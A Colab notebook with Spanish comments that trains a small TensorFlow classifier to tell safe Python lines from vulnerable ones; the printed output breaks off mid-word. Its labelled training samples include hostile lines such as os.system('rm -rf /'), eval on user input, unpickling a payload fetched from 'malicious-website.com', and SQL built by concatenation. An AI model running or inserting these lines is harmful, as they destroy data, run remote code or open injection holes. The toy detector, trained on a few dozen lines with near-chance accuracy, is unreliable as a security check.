<a href="https://colab.research.google.com/github/JoseAngelValadezBarajas/IASoftwareSecurity/blob/main/IACodeSample.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

In [11]:
!pip install --upgrade tensorflow


Looking in indexes: https://pypi.org/simple, https://us-python.pkg.dev/colab-wheels/public/simple/


In [12]:
import random
import numpy as np
import tensorflow as tf
from tensorflow.keras import layers

# Generar el conjunto de datos de código seguro y con vulnerabilidades

safe_code_samples = [
    "def add_numbers(a, b):",
    "    return a + b",
    "",
    "def divide(a, b):",
    "    if b != 0:",
    "        return a / b",
    "    else:",
    "        return 'Error: División entre cero'",
    "",
    "# Comentario de ejemplo",
    "def calculate_average(numbers):",
    "    if len(numbers) > 0:",
    "        return sum(numbers) / len(numbers)",
    "    else:",
    "        return 0"
]

vulnerable_code_samples = [
    "import os",
    "os.system('rm -rf /')",
    "",
    "eval(input('Ingrese un comando: '))",
    "",
    "import pickle",
    "data = pickle.loads(request.get('http://malicious-website.com/payload'))",
    "",
    "def execute_command(command):",
    "    commands = ['ls', 'cat', 'echo']",
    "    if command in commands:",
    "        os.system(command)",
    "",
    "# Consulta SQL insegura",
    "def get_user_data(username):",
    "    query = 'SELECT * FROM users WHERE username=' + username",
    "    # Ejecutar consulta y retornar resultados"
]

safe_labels = [0] * len(safe_code_samples)
vulnerable_labels = [1] * len(vulnerable_code_samples)

code_samples = safe_code_samples + vulnerable_code_samples
labels = safe_labels + vulnerable_labels

# Mezclar los datos
combined_data = list(zip(code_samples, labels))
random.shuffle(combined_data)
code_samples, labels = zip(*combined_data)

# Convertir los ejemplos de código a representación numérica (por ejemplo, one-hot encoding)
vocab = set(" ".join(code_samples).split())  # Vocabulario de palabras
vocab_size = len(vocab)

code_tokenizer = tf.keras.preprocessing.text.Tokenizer(num_words=vocab_size+1, oov_token="<OOV>")
code_tokenizer.fit_on_texts(code_samples)
code_sequences = code_tokenizer.texts_to_sequences(code_samples)

max_length = max(len(seq) for seq in code_sequences)
padded_sequences = tf.keras.preprocessing.sequence.pad_sequences(code_sequences, maxlen=max_length)

# Dividir el conjunto de datos en entrenamiento y prueba
train_size = int(0.8 * len(code_samples))
train_data = padded_sequences[:train_size]
train_labels = np.array(labels[:train_size])

test_data = padded_sequences[train_size:]
test_labels = np.array(labels[train_size:])

# Construir el modelo de IA
embedding_dim = 16

model = tf.keras.Sequential()
model.add(layers.Embedding(input_dim=vocab_size+1, output_dim=embedding_dim, input_length=max_length))
model.add(layers.Conv1D(filters=128, kernel_size=5, activation='relu'))
model.add(layers.GlobalMaxPooling1D())
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(1, activation='sigmoid'))

model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])

# Entrenar el modelo
model.fit(train_data, train_labels, epochs=10, batch_size=32)

# Evaluar el modelo
loss, accuracy = model.evaluate(test_data, test_labels)
print(f"Loss: {loss}")
print(f"Accuracy: {accuracy}")

# Utilizar el modelo entrenado para hacer predicciones sobre nuevos ejemplos de código
new_code_samples = [
    "def add_numbers(a, b):",
    "    return a + b",
    "",
    "def divide(a, b):",
    "    if b != 0:",
    "        return a / b",
    "    else:",
    "        return 'Error: División entre cero'",
    "",
    "# Comentario de ejemplo",
    "def calculate_average(numbers):",
    "    if len(numbers) > 0:",
    "        return sum(numbers) / len(numbers)",
    "    else:",
    "        return 0"
]

new_code_sequences = code_tokenizer.texts_to_sequences(new_code_samples)
new_padded_sequences = tf.keras.preprocessing.sequence.pad_sequences(new_code_sequences, maxlen=max_length)

predictions = model.predict(new_padded_sequences)

for code, prediction in zip(new_code_samples, predictions):
    print(f"Código: {code}")
    print(f"Predicción de seguridad: {prediction}")
    print()


Epoch 1/10
1/1 [==============================] - 2s 2s/step - loss: 0.6928 - accuracy: 0.5200
Epoch 2/10
1/1 [==============================] - 0s 12ms/step - loss: 0.6895 - accuracy: 0.8400
Epoch 3/10
1/1 [==============================] - 0s 10ms/step - loss: 0.6865 - accuracy: 0.6400
Epoch 4/10
1/1 [==============================] - 0s 12ms/step - loss: 0.6836 - accuracy: 0.6400
Epoch 5/10
1/1 [==============================] - 0s 11ms/step - loss: 0.6806 - accuracy: 0.6000
Epoch 6/10
1/1 [==============================] - 0s 15ms/step - loss: 0.6774 - accuracy: 0.6000
Epoch 7/10
1/1 [==============================] - 0s 13ms/step - loss: 0.6741 - accuracy: 0.6000
Epoch 8/10
1/1 [==============================] - 0s 11ms/step - loss: 0.6705 - accuracy: 0.6000
Epoch 9/10
1/1 [==============================] - 0s 10ms/step - loss: 0.6666 - accuracy: 0.6000
Epoch 10/10
1/1 [==============================] - 0s 347ms/step - loss: 0.6853 - accuracy: 0.5714
Loss: 0.6852776408195496
Accur